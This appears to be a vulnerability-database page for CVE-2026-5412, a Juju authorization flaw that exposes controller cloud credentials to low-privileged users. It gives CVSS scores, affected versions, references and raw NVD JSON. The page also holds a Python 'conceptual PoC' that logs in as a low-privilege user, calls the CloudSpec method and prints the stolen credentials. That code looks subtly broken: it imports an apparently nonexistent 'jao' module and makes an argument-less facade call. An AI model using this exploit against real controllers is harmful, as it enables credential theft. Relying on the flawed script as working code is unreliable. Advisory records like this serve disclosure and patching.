Security Vulnerability Report
CVE-2026-5412 CVSS 9.9 CRITICAL

Published: 2026-04-10 13:16:46
Last Modified: 2026-04-30 15:18:26

Description

In Juju versions prior to 2.9.57 and 3.6.21, an authorization issue exists in the Controller facade. An authenticated user can call the CloudSpec API method to extract the cloud credentials used to bootstrap the controller. This allows a low-privileged user to access sensitive credentials. This issue is resolved in Juju versions 2.9.57 and 3.6.21.

CVSS Details

CVSS Score: 9.9
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Weakness: CWE-285 (Improper Authorization)

The 9.9 figure is the Secondary (CNA-supplied) assessment in the record. The Primary NVD assessment in the raw data below rates the issue 6.5 MEDIUM (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N), i.e. a high confidentiality impact only, with no integrity or availability impact and no scope change; the two sources differ on whether credential disclosure lets an attacker reach beyond the controller itself.

Configurations (Affected Products)

cpe:2.3:a:canonical:juju:*:*:*:*:*:*:*:* (versions before 2.9.57) - VULNERABLE
cpe:2.3:a:canonical:juju:*:*:*:*:*:*:*:* (versions from 3.6 up to, but excluding, 3.6.21) - VULNERABLE
Juju < 2.9.57
Juju 3.6 <= version < 3.6.21

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
Conceptual PoC for CVE-2026-5412
Demonstrates credential extraction via CloudSpec API.
"""
import asyncio
from juju import jao
from juju.client import client


async def get_cloud_spec(controller_addr, username, password):
    # Connect to the Juju Controller
    conn = await jao.connect(controller_addr)
    try:
        # Login with low-privilege user credentials
        await conn.login(username, password)
        # Access the vulnerable Controller facade
        # The vulnerability allows low-priv users to call this
        controller_facade = client.ControllerFacade.from_connection(conn)
        print("[*] Attempting to retrieve CloudSpec...")
        # Call the CloudSpec method which exposes credentials in vulnerable versions
        cloud_spec = await controller_facade.CloudSpec()
        print("[+] Success! Extracted sensitive cloud credentials:")
        print(f"Cloud Credential: {cloud_spec['cloud_credential']}")
        print(f"Endpoint: {cloud_spec['endpoint']}")
        return cloud_spec
    except Exception as e:
        print(f"[-] Exploit failed: {e}")
    finally:
        await conn.close()


if __name__ == "__main__":
    # Example usage
    # asyncio.run(get_cloud_spec("wss://10.0.0.1:17070", "low_user", "pass123"))
    pass
```

References

https://github.com/juju/juju/pull/22205 (Issue Tracking, Patch)
https://github.com/juju/juju/pull/22206 (Issue Tracking, Patch)
https://github.com/juju/juju/security/advisories/GHSA-w5fq-8965-c969 (Exploit, Third Party Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-5412",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-10T13:16:45.780",
    "lastModified": "2026-04-30T15:18:26.430",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "In Juju versions prior to 2.9.57 and 3.6.21, an authorization issue exists in the Controller facade. An authenticated user can call the CloudSpec API method to extract the cloud credentials used to bootstrap the controller. This allows a low-privileged user to access sensitive credentials. This issue is resolved in Juju versions 2.9.57 and 3.6.21."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
            "baseScore": 9.9,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.1,
          "impactScore": 6.0
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-285"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:canonical:juju:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "2.9.57",
                "matchCriteriaId": "A2161D9F-0627-4EAF-A6FD-81B9056D31FC"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:canonical:juju:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "3.6",
                "versionEndExcluding": "3.6.21",
                "matchCriteriaId": "2966CF99-1F57-40F3-8EFA-161BF47644DB"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/juju/juju/pull/22205",
        "source": "[email protected]",
        "tags": ["Issue Tracking", "Patch"]
      },
      {
        "url": "https://github.com/juju/juju/pull/22206",
        "source": "[email protected]",
        "tags": ["Issue Tracking", "Patch"]
      },
      {
        "url": "https://github.com/juju/juju/security/advisories/GHSA-w5fq-8965-c969",
        "source": "[email protected]",
        "tags": ["Exploit", "Third Party Advisory"]
      }
    ]
  }
}
```